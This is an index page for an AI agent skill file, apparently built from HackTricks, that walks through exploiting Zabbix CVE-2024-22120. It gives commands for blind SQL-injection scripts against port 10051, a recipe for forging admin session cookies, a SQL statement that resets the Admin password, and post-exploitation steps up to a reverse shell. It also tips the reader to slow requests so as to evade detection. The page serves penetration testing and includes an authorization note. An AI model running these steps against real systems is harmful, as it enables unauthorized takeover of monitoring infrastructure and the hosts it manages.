OpenSkillIndex← back to search

Hacktricks-skills zabbix-pentest

Zabbix security assessment and exploitation. Use this skill whenever the user mentions Zabbix monitoring, CVE-2024-22120, Zabbix SQLi, Zabbix cookie forgery, Zabbix RCE, or any Zabbix-related security testing. Trigger for Zabbix web UI assessment, port 10051/10050 enumeration, session cookie analysis, blind SQLi exploitation, admin privilege escalation, and post-exploitation activities on Zabbix infrastructure.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/zabbix/SKILL.MD
source content

Zabbix Security Assessment

A skill for assessing Zabbix monitoring infrastructure, exploiting CVE-2024-22120, and performing post-exploitation activities.

When to Use This Skill

Use this skill when:

  • Assessing Zabbix monitoring systems (web UI or server ports)
  • Investigating CVE-2024-22120 vulnerabilities
  • Analyzing or forging Zabbix session cookies
  • Performing time-based blind SQLi against Zabbix server
  • Escalating from low-priv to admin access in Zabbix
  • Executing scripts or achieving RCE via Zabbix
  • Capturing credentials or pivoting from Zabbix access

Quick Start

# Full automated exploit (requires low-priv sessionid)
python scripts/zabbix_exploit.py --target zabbix.example.tld --sid <low-priv-sessionid>

# Manual exploitation steps
python scripts/zabbix_sqli.py --target zabbix.example.tld --port 10051 --sid <sessionid> --hostid 10084 --scriptid 1

Zabbix Architecture

Zabbix exposes three attack surfaces:

ComponentPortProtocolNotes
Web UI80/443HTTP(S)Login, session management
Server10051ZBXD/JSONAudit log SQLi vector
Agent10080ZBXD/JSONAgent communication

Exploitation Workflow

Phase 1: Reconnaissance

  1. Identify Zabbix installation

    • Look for 
      /zabbix.php
      endpoints
    • Check for 
      zbx_session
      cookies
    • Scan ports 10050/10051

  2. Obtain low-priv sessionid

    • Login as guest or low-priv user via web UI
    • Decode 
      zbx_session
      cookie (Base64)
    • Extract 
      sessionid
      field (32 hex chars)

  3. Discover hostid and scriptid

    • Navigate to Monitoring → Hosts in web UI
    • Intercept requests to find 
      hostid
      (default: 10084)
    • Check script menu for available 
      scriptid
      values (1, 2 often allowed)

Phase 2: CVE-2024-22120 Exploitation

The vulnerability allows time-based blind SQLi via the Zabbix server port when executing scripts.

Attack flow:

  1. Send crafted 
    command
    request to port 10051
  2. Inject SQL payload in 
    clientip
    field
  3. Measure response time to bruteforce secrets
  4. Extract 
    session_key
    and admin 
    sessionid
  5. Forge admin cookie

Use the bundled script:

python scripts/zabbix_sqli.py \
  --target zabbix.example.tld \
  --port 10051 \
  --sid <low-priv-sessionid> \
  --hostid 10084 \
  --scriptid 1 \
  --extract session_key \
  --timeout-true 10 \
  --timeout-false 1

Phase 3: Admin Access

Once you have 

session_key
and admin 
sessionid
:

python scripts/zabbix_cookie.py \
  --session-key <32-hex-key> \
  --session-id <admin-sessionid> \
  --output cookie.txt

Set the 

zbx_session
cookie in your browser and access 
/zabbix.php?action=dashboard.view

Phase 4: Post-Exploitation

Execute scripts on monitored hosts:

  • Use Admin UI to run predefined scripts
  • Scripts execute as 
    zabbix
    user on target hosts
  • Can achieve reverse shell if command execution is available

Alternative: Reset Admin password If you have database access:

UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';

This sets password to 

zabbix
.

Cookie Format

The 

zbx_session
cookie structure:

# Data payload
data = {
    "sessionid": "<32-hex>",
    "serverCheckResult": True,
    "serverCheckTime": <unix_timestamp>
}

# Signature
sign = HMAC_SHA256(
    key=session_key,
    data=json.dumps(data, sort_keys=True, separators=(',', ':'))
)

# Final cookie
zbx_session = base64.b64encode(json.dumps({**data, "sign": sign}))

Timing Attack Parameters

ParameterRecommended ValuePurpose
T_TRUE8-12 secondsDelay when condition is true
T_FALSE1-2 secondsDelay when condition is false
Charset0-9a-fHex characters for session keys
Length32 charsSession key and sessionid length

Operational Tips

  • Validate scriptid: Ensure the scriptid is permitted for your role before brute-forcing
  • Cache results: Save recovered admin sessionid for reuse
  • Rate limiting: Add delays between requests to avoid detection
  • Connection pooling: Reuse TCP connections when possible
  • Error handling: Handle connection timeouts gracefully

Bundled Scripts

ScriptPurpose
scripts/zabbix_frame.py
Frame ZBXD protocol messages
scripts/zabbix_sqli.py
Time-based SQLi bruteforce
scripts/zabbix_cookie.py
Forge admin session cookies
scripts/zabbix_exploit.py
Full exploit orchestration

References

Affected Versions

  • 6.0.0–6.0.27
  • 6.4.0–6.4.12
  • 7.0.0alpha1

Safety Notes

  • Only use on systems you have authorization to test
  • Time-based attacks can be slow (32 chars × 16 possibilities × 10s = ~5 minutes per secret)
  • Monitor for rate limiting or IDS alerts
  • Clean up any credential capture hooks after testing